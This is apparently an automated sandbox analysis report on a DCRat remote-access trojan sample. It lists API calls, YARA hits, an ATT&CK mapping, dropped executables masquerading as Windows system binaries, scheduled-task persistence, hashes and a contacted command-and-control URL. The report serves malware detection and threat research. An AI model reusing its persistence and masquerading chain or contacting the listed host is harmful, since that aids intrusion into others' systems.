          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeMemory allocated: 1090000 memory reserve | memory write watchJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeMemory allocated: 1AC80000 memory reserve | memory write watchJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWindow / User API: threadDelayed 1298Jump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWindow / User API: threadDelayed 1154Jump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe TID: 7848Thread sleep count: 1298 > 30Jump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe TID: 7840Thread sleep count: 1154 > 30Jump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exe TID: 7824Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00B8A5F4
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00B9B8E0
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BAAAA8 FindFirstFileExA,1_2_00BAAAA8
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9DD72 VirtualQuery,GetSystemInfo,1_2_00B9DD72
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\userJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: file.exe, 00000001.00000003.1317844721.00000000031B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Q
          Source: comProviderServer.exe, 00000007.00000002.1422323551.000000001BC9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: file.exe, 00000001.00000002.1320608135.00000000031B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2
          Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-24541
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BA866F
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA753D mov eax, dword ptr fs:[00000030h]1_2_00BA753D
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BAB710 GetProcessHeap,1_2_00BAB710
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9F063 SetUnhandledExceptionFilter,1_2_00B9F063
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00B9F22B
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00BA866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BA866F
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00B9EF05
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe" Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\reviewDriverIntosessionnet\comProviderServer.exe "C:\reviewDriverIntosessionnet\comProviderServer.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9ED5B cpuid 1_2_00B9ED5B
          Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_00B9A63C
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeQueries volume information: C:\reviewDriverIntosessionnet\comProviderServer.exe VolumeInformationJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,1_2_00B9D5D4
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B8ACF5 GetVersionExW,1_2_00B8ACF5
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected DCRat
          Source: Yara matchFile source: 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1397210421.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: comProviderServer.exe PID: 7800, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected DCRat
          Source: Yara matchFile source: 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1397210421.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: comProviderServer.exe PID: 7800, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information12
          Scripting          		Valid Accounts11
          Windows Management Instrumentation          		1
          Scheduled Task/Job          		11
          Process Injection          		233
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		12
          Scripting          		1
          Scheduled Task/Job          		1
          Disable or Modify Tools          		LSASS Memory21
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media1
          Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Scheduled Task/Job          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		31
          Virtualization/Sandbox Evasion          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection          		NTDS31
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information          		Cached Domain Credentials3
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Software Packing          		DCSync37
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1521601 Sample: file.exe Startdate: 29/09/2024 Architecture: WINDOWS Score: 100 45 Found malware configuration 2->45 47 Antivirus detection for dropped file 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 8 other signatures 2->51 9 file.exe 3 7 2->9         started        process3 file4 41 C:\...\comProviderServer.exe, PE32 9->41 dropped 43 C:\reviewDriverIntosessionnet\V50gFn.vbe, data 9->43 dropped 12 wscript.exe 1 9->12         started        15 wscript.exe 9->15         started        process5 signatures6 61 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->61 17 cmd.exe 1 12->17         started        process7 process8 19 comProviderServer.exe 3 32 17->19         started        23 conhost.exe 17->23         started        file9 33 C:\reviewDriverIntosessionnet\spoolsv.exe, PE32 19->33 dropped 35 C:\...\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe, PE32 19->35 dropped 37 C:\Windows\...\StartMenuExperienceHost.exe, PE32 19->37 dropped 39 11 other malicious files 19->39 dropped 53 Antivirus detection for dropped file 19->53 55 Machine Learning detection for dropped file 19->55 57 Drops PE files to the user root directory 19->57 59 3 other signatures 19->59 25 schtasks.exe 19->25         started        27 schtasks.exe 19->27         started        29 schtasks.exe 19->29         started        31 27 other processes 19->31 signatures10 process11

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe61%ReversingLabsByteCode-MSIL.Trojan.Uztuby
          file.exe100%AviraVBS/Runner.VPG
          file.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%AviraHEUR/AGEN.1323984
          C:\reviewDriverIntosessionnet\spoolsv.exe100%AviraHEUR/AGEN.1323984
          C:\Users\user\AppData\Local\Temp\vEbYiTsQ2u.bat100%AviraBAT/Delbat.C
          C:\Users\Public\Downloads\explorer.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%AviraHEUR/AGEN.1323984
          C:\Users\user\wscript.exe100%AviraHEUR/AGEN.1323984
          C:\reviewDriverIntosessionnet\V50gFn.vbe100%AviraVBS/Runner.VPG
          C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files\Windows Defender Advanced Threat Protection\services.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%AviraHEUR/AGEN.1323984
          C:\reviewDriverIntosessionnet\comProviderServer.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe100%AviraHEUR/AGEN.1323984
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%Joe Sandbox ML
          C:\reviewDriverIntosessionnet\spoolsv.exe100%Joe Sandbox ML
          C:\Users\Public\Downloads\explorer.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%Joe Sandbox ML
          C:\Users\user\wscript.exe100%Joe Sandbox ML
          C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe100%Joe Sandbox ML
          C:\Program Files\Windows Defender Advanced Threat Protection\services.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe100%Joe Sandbox ML
          C:\reviewDriverIntosessionnet\comProviderServer.exe100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe100%Joe Sandbox ML

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://nezik.ru.swtest.ru/@=ETYmFWY1UWOtrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecomProviderServer.exe, 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1521601
            Start date and time:2024-09-29 01:00:08 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 2s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:43
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:file.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@43/33@0/0
            EGA Information:
            • Successful, ratio: 50%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): Conhost.exe, services.exe, dllhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target comProviderServer.exe, PID 7800 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: file.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            01:01:13Task SchedulerRun new task: services path: "C:\Program Files\Windows Defender Advanced Threat Protection\services.exe"
            01:01:13Task SchedulerRun new task: servicess path: "C:\Program Files\Windows Defender Advanced Threat Protection\services.exe"
            01:01:13Task SchedulerRun new task: WmiPrvSE path: "C:\Program Files\Windows Sidebar\WmiPrvSE.exe"
            01:01:13Task SchedulerRun new task: WmiPrvSEW path: "C:\Program Files\Windows Sidebar\WmiPrvSE.exe"
            01:01:15Task SchedulerRun new task: bdoMPjmZJHMIJMdqEctkzcHPTiy path: "C:\Recovery\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe"
            01:01:15Task SchedulerRun new task: bdoMPjmZJHMIJMdqEctkzcHPTiyb path: "C:\Recovery\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe"
            01:01:15Task SchedulerRun new task: explorer path: "C:\Users\Public\Downloads\explorer.exe"
            01:01:16Task SchedulerRun new task: explorere path: "C:\Users\Public\Downloads\explorer.exe"
            01:01:16Task SchedulerRun new task: spoolsv path: "C:\reviewDriverIntosessionnet\spoolsv.exe"
            01:01:16Task SchedulerRun new task: spoolsvs path: "C:\reviewDriverIntosessionnet\spoolsv.exe"
            01:01:16Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe"
            01:01:16Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe"
            01:01:18Task SchedulerRun new task: wscript path: "C:\Users\user\wscript.exe"
            01:01:18Task SchedulerRun new task: wscriptw path: "C:\Users\user\wscript.exe"

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Program Files (x86)\Microsoft.NET\RedistList\24dbde2999530e

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (785), with no line terminators
            Category:dropped
            Size (bytes):785
            Entropy (8bit):5.911093002342794
            Encrypted:false
            SSDEEP:24:pjO5hN5wKhCASJVJlV+4hB30ccrWYq5qns:ShThIJVBrQMus
            MD5:A4CFE8AE9DD1EE4890DEDD07CDD17598
            SHA1:D89D172CB4A847917278E86EA28C502AFA136AE1
            SHA-256:DFB9BE4756FB79F4E89FF7EF195156CB8E6C6F16913BAFB9A9DDD1EEF4D6F927
            SHA-512:DD3AED36B895831465814A3B5C4448A637EB4BE3524D3364E0243B5762EECD3723D43F07E3FDB72DA23307AEF874022F8D445C2F545DA71F4027FAE9E057B283
            Malicious:false
            Preview:k0tNiXPTy6MFPReGo3io6ZmKZSvbBNVHxFqOebamDZE09KgwoJpXxBzLNiyPlyRlkFSKlPmMc5lhUwKOw9w2h7TvPfA5nLAPIdP42WKYgc42aS0bXjdmBYDnvg4GOqjR5WY0gQVZyYVFCbV7ojhDrYNtamIVbEJz3n6D394HNDxmC7kUL7cpJfjhIpa4IA8uOfMZeRDooa0nklqdCyKdldqXDZ4NjA9NFDXhuKz33yBsp56h872UzeIvzyVEXzEnbmihNJs18Qkxc8sIcXPmIoXl4ms6zvgDtXRCXZUzPBWj4US0FNl9kcfwO6mkbvBMtgEEqpuDDZWHSyrjU10mJhdQ2eyawtXd9JzXQOKaci6KFXdZPCQk5YDMDxLL1TQUB3HJ9TTFqZKllSLeAYLucxhkGmUcC8jIRmILQUa5tK3fOclumrKcIg1OWgCW81Ds0BT8J9Oq8QAR3BWoAk0UxGAvu4ztRE62HLpMImlndee1fjUUKYVYBs4tBhOOJeY4TIKsWJfY8M1TmIQLkfi2sh1YQ5LlYWd8GjhWYl7B37ay1lG2RCoo5fLwRwbb839lt3MDk3x8hh9vGDhpySUVsyCkYvFmJgCA7yE8YDSXPqHXgapOPwmpjn340mozyKyAf9xS8jQuA6GBroE7F0WX4XaU4JHwYcjE2H2hnXPqg1pmh2NLhqt7ybGHidXzbdVhXBJkwhUskq0CrxwC56OrsmQbAu8J9aODfHPgsnZAWBWHkDauqU3fOnyvusjBiKsKcxgjiQTSgOVqPJ06U

            C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Windows Media Player\Network Sharing\48b6e448d1d68f

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (849), with no line terminators
            Category:dropped
            Size (bytes):849
            Entropy (8bit):5.887620635318584
            Encrypted:false
            SSDEEP:12:xrRDFoMfsggLrVstHSd0tWZ4NvBScF5mur2eV7NWVbUzhPbPKEgSz2nnnn:bD2MfZgLrYHSd0tI65viHhUxxgSz2n
            MD5:2BCBB6F8B83F66AD1936E8A71CAF94E2
            SHA1:385B81599E10F841FBEB76030D3D85CDFDEF7650
            SHA-256:827062C1A21107514E2DABDD4A24BB4E789BF645EB66EA699EB8F0606C0F7159
